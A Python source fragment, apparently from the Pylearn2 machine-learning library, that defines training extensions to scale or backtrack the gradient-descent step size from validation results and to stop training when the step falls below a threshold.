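# >>> shrinker = StepShrinker(channel='valid_objective', scale=0.5,
# ...                         giveup_after=1e-4, scale_up=1.1)
# >>> algorithm = BGD(..., termination_criterion=shrinker)
# >>> train = Train(dataset, model, algorithm, extensions=[shrinker])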
class ScaleStep(TrainExtension):
"""
.. todo::
WRITEME
"""
def __init__(self, scale, min_value):
self.scale = scale
self.min_value = min_value
self.first = True
def on_monitor(self, model, dataset, algorithm):
"""
.. todo::
WRITEME
"""
if self.first:
monitor = model.monitor
self.first = False
self.monitor_channel = sharedX(algorithm.scale_step)
# TODO: make monitor accept channels not associated with any
# dataset,
# so this hack won't be necessary
hack = monitor.channels.values()[0]
monitor.add_channel('scale_step', hack.graph_input,
self.monitor_channel, dataset=hack.dataset)
cur = algorithm.scale_step
cur *= self.scale
cur = max(cur, self.min_value)
algorithm.scale_step = cur
self.monitor_channel.set_value(np.cast[config.floatX](cur))
class BacktrackingStepShrinker(TrainExtension, TerminationCriterion):
"""
.. todo::
WRITEME
"""
def __init__(self, channel, scale, giveup_after, scale_up=1.,
max_scale=1.):
self.__dict__.update(locals())
del self.self
self.continue_learning = True
self.first = True
self.prev = np.inf
def on_monitor(self, model, dataset, algorithm):
"""
.. todo::
WRITEME
"""
monitor = model.monitor
if self.first:
self.first = False
self.monitor_channel = sharedX(algorithm.scale_step)
# TODO: make monitor accept channels not associated with any
# dataset,
# so this hack won't be necessary
hack = monitor.channels.values()[0]
monitor.add_channel('scale_step', hack.graph_input,
self.monitor_channel, dataset=hack.dataset)
channel = monitor.channels[self.channel]
v = channel.val_record
if len(v) == 1:
return
latest = v[-1]
logger.info("Latest {0}: {1}".format(self.channel, latest))
# Only compare to the previous step, not the best step so far
# Another extension can be in charge of saving the best parameters ever
        # seen. We want to keep learning as long as we're making progress. We
# don't want to give up on a step size just because it failed to undo
# the damage of the bigger one that preceded it in a single epoch
logger.info("Previous is {0}".format(self.prev))
cur = algorithm.scale_step
if latest >= self.prev:
logger.info("Looks like using {0} "
"isn't working out so great for us.".format(cur))
cur *= self.scale
if cur < self.giveup_after:
logger.info("Guess we just have to give up.")
self.continue_learning = False
cur = self.giveup_after
logger.info("Let's see how {0} does.".format(cur))
logger.info("Reloading saved params from last call")
for p, v in safe_zip(model.get_params(), self.stored_values):
p.set_value(v)
latest = self.prev
elif latest <= self.prev and self.scale_up != 1.:
logger.info("Looks like we're making progress "
"on the validation set, let's try speeding up")
cur *= self.scale_up
if cur > self.max_scale:
cur = self.max_scale
logger.info("New scale is {0}".format(cur))
algorithm.scale_step = cur
self.monitor_channel.set_value(np.cast[config.floatX](cur))
self.prev = latest
self.stored_values = [param.get_value() for param in
model.get_params()]
def __call__(self, model):
"""
.. todo::
WRITEME
"""
return self.continue_learning
authors: ["julius506@gmail.com"] | author_id: julius506@gmail.com